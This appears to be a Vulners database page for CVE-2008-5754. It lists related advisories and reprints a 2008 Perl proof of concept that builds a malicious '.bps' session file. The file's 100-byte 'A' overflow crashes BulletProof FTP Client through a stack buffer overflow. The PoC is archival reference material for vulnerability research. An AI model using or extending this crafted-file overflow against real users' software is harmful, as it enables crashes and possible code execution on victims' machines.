| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2008-5754 | 28 Dec 200800:00 | – | circl | |
| CVE-2008-5754 | 30 Dec 200817:00 | – | cve | |
| CVE-2008-5754 | 30 Dec 200817:00 | – | cvelist | |
| BulletProof FTP Client 2009 - '.bps' Local Buffer Overflow (SEH) | 13 Apr 200900:00 | – | exploitdb | |
| BulletProof FTP Client 2.63 b56 - '.bps' File Stack Buffer Overflow | 7 Oct 200900:00 | – | exploitdb | |
| EUVD-2008-5724 | 7 Oct 202500:30 | – | euvd | |
| CVE-2008-5754 | 30 Dec 200817:30 | – | nvd | |
| BulletProof FTP Client '.bps' File Buffer Overflow Vulnerability | 6 Jan 200900:00 | – | openvas | |
| Stack overflow | 30 Dec 200817:30 | – | prion |
#!/usr/bin/perl
########################################
#[*] Bug : BulletProof FTP Client .bps Local Stack Overflow (PoC)
#[*] Founded by : Mountassif Moad
#[*] Greetz : All Freind Str0ke
#[*] HOw to use => go to file after Load BP session & Enter and boom :d overflowing :d
########################################
use warnings;
use strict;
my $chars = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n" .
"\x41" x 100 .
"\n21\n".
"Stack\n".
"bpfhljamedaldlffpojmqhpo\n".
"c:\/\n" .
"/\n";
my $file="Stack.bps";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Credits:Stack";
# milw0rm.com [2008-12-28]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation